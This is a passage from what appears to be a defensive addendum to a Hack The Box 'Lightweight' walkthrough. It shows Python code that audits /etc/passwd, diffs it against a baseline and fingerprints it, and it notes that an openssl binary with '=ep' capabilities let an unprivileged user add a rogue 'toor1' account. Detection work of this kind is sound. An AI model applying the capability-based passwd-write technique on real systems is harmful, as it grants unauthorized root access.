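            findings.append((e["name"], "duplicate account name"))
        seen.add(e["name"])
    return findings


def added_entries(baseline, current):
    """Lines present now but absent from the baseline: what an FIM tool would report."""
    known = set(baseline.splitlines())
    return [line for line in current.splitlines() if line not in known]


def fingerprint(text):
    """SHA-256 of the file, the value a baseline store would keep for /etc/passwd."""
    return hashlib.sha256(text.encode()).hexdigest()


if __name__ == "__main__":
    for account, reason in audit_passwd(parse_passwd(PASSWD_AFTER)):
        print(f"{account}: {reason}")
    print("added:", added_entries(PASSWD_BEFORE, PASSWD_AFTER))
```

The audit is stateless, so it catches the toor1 entry even on a host with no baseline; the fingerprint and added-entries comparison is the stronger control because it also catches edits that keep the field values plausible. Pairing it with the capability audit closes the loop: the only reason an unprivileged user could write /etc/passwd here was the `=ep` openssl binary.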
credits to : https://www.hackingarticles.in/lightweight-hack-the-box-walkthrough/
Author: Jacco Straathof